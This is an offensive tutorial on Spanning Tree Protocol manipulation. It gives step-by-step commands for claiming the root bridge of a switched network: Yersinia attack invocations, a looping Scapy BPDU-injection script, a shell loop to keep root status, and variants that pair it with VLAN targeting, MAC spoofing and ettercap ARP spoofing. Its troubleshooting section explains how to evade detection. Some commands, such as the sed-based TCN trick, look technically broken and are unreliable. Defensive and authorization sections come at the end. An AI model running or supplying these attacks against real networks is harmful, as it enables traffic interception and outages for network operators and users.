STP Manipulation

Understanding STP Manipulation - Network Topology Control

What is STP Manipulation?

Simple Definition: STP manipulation is an attack that tricks network switches into changing their forwarding paths by becoming the “root bridge,” forcing all network traffic to flow through the attacker’s system for interception and analysis.

Technical Definition: Spanning Tree Protocol (STP) manipulation exploits the root bridge election process by sending Bridge Protocol Data Units (BPDUs) with superior priority values, causing legitimate switches to recalculate their topology and forward traffic through the attacker-controlled path.

Why STP Manipulation Works

STP manipulation succeeds due to protocol design characteristics:

  • Trust-Based Protocol: STP assumes all BPDUs are legitimate without authentication
  • Automatic Recalculation: Switches automatically adjust topology when receiving “better” bridge information
  • Lowest Priority Wins: Root bridge selection uses simple numeric comparison (lowest wins)
  • No Source Verification: Switches don’t verify the legitimacy of BPDU senders

Attack Process Breakdown

Normal STP Operation

  1. Bridge ID Advertisement: All switches send BPDUs claiming their Bridge Priority + MAC Address
  2. Root Election: Switch with lowest Bridge ID becomes root bridge
  3. Path Calculation: All switches calculate shortest path to root
  4. Port Blocking: Redundant paths blocked to prevent loops
  5. Traffic Flow: All inter-VLAN traffic flows through root bridge

STP Manipulation Attack

  1. BPDU Injection: Attacker sends BPDUs with priority 0 (lowest possible)
  2. Topology Disruption: Legitimate switches recognize attacker as new root
  3. Path Recalculation: Switches recalculate forwarding paths through attacker
  4. Traffic Redirection: All network traffic flows through attacker’s system
  5. Man-in-the-Middle Position: Attacker intercepts and forwards all communications

Real-World Impact

Complete Network Interception: All traffic between VLANs and network segments flows through attacker

Corporate Network Compromise: Intercept management traffic, database connections, file transfers

Network Performance Degradation: Forcing traffic through suboptimal path causes delays

Topology Disruption: Legitimate network convergence and failover mechanisms compromised

Stealth Persistence: Attack continues until network is properly secured or devices restarted

Technical Concepts

Spanning Tree Protocol Fundamentals

Purpose: Prevents Layer 2 loops while maintaining redundancy in switched networks

Bridge Protocol Data Units (BPDUs):

  • Configuration BPDUs: Normal STP operation
  • Topology Change Notifications: Signal network changes
  • Root Bridge: Single switch that serves as topology reference point

Bridge ID Structure:

  • Bridge Priority: 2-byte value (0-65535, default 32768)
  • MAC Address: 6-byte hardware address
  • Combined: Lower Bridge ID wins root election

Root Bridge Election Process

Election Criteria (in order):

  1. Lowest Bridge Priority
  2. Lowest MAC Address (if priority tied)

Port States:

  • Root Port: Best path to root bridge
  • Designated Port: Forwards traffic on segment
  • Blocked Port: Prevents loops, doesn’t forward

STP Variants and Compatibility

Common Protocols:

  • STP (802.1D): Original standard
  • RSTP (802.1w): Rapid convergence
  • MSTP (802.1s): Multiple instances
  • PVST+: Per-VLAN spanning tree

Attack Compatibility: Basic BPDU manipulation works across all STP variants

Technical Implementation

Prerequisites

Network Requirements:

  • Layer 2 network access with STP enabled
  • Switch ports configured for STP participation
  • Knowledge of current network topology

Essential Tools:

  • Yersinia: Comprehensive STP attack framework
  • Scapy: Custom BPDU crafting
  • Tcpdump: BPDU monitoring and verification
  • Brctl: Bridge utilities for Linux

Essential Command Sequence

Step 1: STP Reconnaissance 

# Monitor existing BPDU traffic
tcpdump -nn -v -i eth0 -s 1500 'stp'
# Captures spanning tree BPDUs
# Reveals current root bridge and topology
# Shows bridge priorities and MAC addresses

# Analyze current root bridge
tcpdump -nn -v -i eth0 'stp' | head -20
# Look for "Root ID" in BPDU output
# Identifies current root bridge priority and MAC
# Note: Lower priority + MAC = current root

# Check if STP is active
# If BPDUs visible, STP enabled and vulnerable
# Note current convergence timing for attack planning

Purpose: Understand current STP topology and identify optimal attack parameters to successfully claim root bridge status.

Step 2: Bridge Priority Assessment 

# Capture and decode BPDU details
tcpdump -nn -x -i eth0 'stp'
# -x: Show packet content in hex
# Decode bridge priority values
# Identify lowest priority currently in use

# Monitor topology convergence time
tcpdump -tt -i eth0 'stp' | head -10
# -tt: Show absolute timestamps
# Measure time between topology changes
# Important for timing attack injection

Purpose: Determine current bridge priorities and convergence timing to craft effective attack BPDUs.

Step 3: Execute Root Bridge Takeover

Using Yersinia:

# Launch Yersinia interactive interface
yersinia -I
# Select: STP protocol
# Choose: "claiming root role" attack
# Automatically sends BPDUs with priority 0

# Command-line root bridge attack
yersinia stp -attack 1
# Attack 1: Claim root bridge role
# Sends continuous BPDUs with lowest priority
# Forces topology recalculation through attacker

Manual BPDU Crafting with Scapy:

#!/usr/bin/env python3
from scapy.all import *

# Craft malicious BPDU claiming root
bpdu = Ether(dst="01:80:c2:00:00:00")/LLC()/STP(
    rootid=0,          # Claim priority 0 (lowest)
    bridgeid=0,        # Our bridge priority 0
    portid=0x8001,     # Port identifier
    rootpathcost=0     # Cost to root (we are root)
)

# Send BPDUs continuously
while True:
    sendp(bpdu, iface="eth0")
    time.sleep(2)  # Send every 2 seconds (standard interval)

Linux Bridge Configuration (alternative method):

# Configure local bridge with low priority
brctl addbr br0
brctl addif br0 eth0
ifconfig br0 up

# Set extremely low bridge priority
echo 0 > /sys/class/net/br0/bridge/priority
# Priority 0 should win root election
# Monitor with tcpdump to verify success

Step 4: Verify Root Bridge Status 

# Monitor for topology change
tcpdump -nn -v -i eth0 'stp' | grep -i "root"
# Should show attacker MAC as new root
# Topology Change Notifications indicate success

# Check traffic redirection
tcpdump -nn -c 100 -i eth0 not arp and not host $(hostname -I)
# If seeing significant inter-VLAN traffic:
# Attack successful, traffic routing through attacker

# Verify forwarding is working
ping 8.8.8.8
# Should work if properly forwarding traffic
# Broken connectivity indicates misconfiguration

Purpose: Confirm successful root bridge takeover and verify traffic is flowing through attacker system.

Step 5: Maintain Root Bridge Status 

# Continuous BPDU transmission
while true; do
    yersinia stp -attack 1 &
    sleep 30  # Refresh every 30 seconds
    killall yersinia
done
# Maintains root bridge claim
# Prevents legitimate root from recovering

# Monitor for competing BPDUs
tcpdump -nn -v -i eth0 'stp' | grep -E "(priority|bridge)"
# Watch for other devices claiming lower priority
# Adjust attack if necessary

Purpose: Sustain root bridge position and prevent legitimate topology recovery.

Attack Variations

Topology Change Attacks 

# Generate topology change notifications
yersinia stp -attack 4
# Forces MAC address table flushing
# Creates network disruption and monitoring opportunities
# Useful combined with other Layer 2 attacks

# Custom topology change notifications
tcpdump -w - -i eth0 'stp' | head -c 200 | \
sed 's/\x00\x00/\x80\x01/' | tcpdump -r -
# Modifies captured BPDUs to include TCN flag

Selective VLAN STP Attacks 

# Target specific VLAN instances (PVST+)
yersinia stp -attack 1 -vlan 100
# Claims root for specific VLAN only
# More targeted than global root takeover
# Useful for specific VLAN compromise

Bridge ID Spoofing 

# Spoof legitimate bridge MAC addresses
yersinia stp -attack 1 -source 00:1a:2b:3c:4d:5e
# Uses specific MAC address for bridge ID
# Can impersonate legitimate network equipment
# Harder to detect than random MAC addresses

Common Issues and Solutions

Problem: BPDUs sent but topology doesn’t change

  • Solution: Verify STP enabled on network, check for STP security features like Root Guard

Problem: Network connectivity lost after attack

  • Solution: Enable IP forwarding, configure bridging properly, ensure attacker forwards traffic

Problem: Attack detected and port disabled

  • Solution: Use legitimate-looking bridge priorities, vary timing, spoof known bridge MACs

Problem: Only affecting single VLAN

  • Solution: Attack may only work on PVST+ networks, try targeting multiple VLAN instances

Advanced Techniques

Combining with Other Attacks 

# STP manipulation + ARP spoofing
# Step 1: Become root bridge (all traffic flows through)
yersinia stp -attack 1 &
# Step 2: ARP spoof for granular control
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1//

RSTP Rapid Convergence Abuse 

# Exploit rapid convergence for faster attacks
# Send Proposal/Agreement BPDUs
# Forces immediate topology change
# More effective against RSTP networks

Detection and Prevention

Detection Indicators

  • Unexpected BPDUs from non-switch devices
  • Frequent topology change notifications
  • New root bridge appearing suddenly
  • Network performance degradation
  • Root bridge with MAC address not matching known infrastructure

Prevention Measures

Root Guard:

  • Prevents unauthorized root bridge elections
  • Configured on access ports
  • Disables port if unauthorized BPDU received

BPDU Guard:

  • Immediately shuts down ports receiving BPDUs
  • Applied to access ports connecting end devices
  • Prevents BPDU injection attacks

Bridge ID Security:

  • Configure explicit bridge priorities on infrastructure
  • Use very low priorities on intended root bridges
  • Monitor for unexpected bridge priority changes

STP Security Features:

  • Enable PortFast on access ports
  • Implement BPDU filtering
  • Use RSTP for faster convergence and better security

Professional Context

Legitimate Use Cases

  • Network Testing: Validating STP security configurations
  • Topology Analysis: Understanding network convergence behavior
  • Disaster Recovery: Testing failover and recovery procedures
  • Security Assessment: Identifying weak STP implementations

Legal and Ethical Requirements

Authorization: STP attacks can severely disrupt network operations - explicit written permission essential

Impact Assessment: Document potential for network-wide outages and service disruption

Recovery Plan: Ensure ability to restore normal STP operation quickly

Scope Definition: Clearly identify which network segments are in-scope for STP testing

STP manipulation attacks highlight the critical importance of securing Layer 2 infrastructure protocols, as compromise can provide network-wide visibility and control over traffic flows.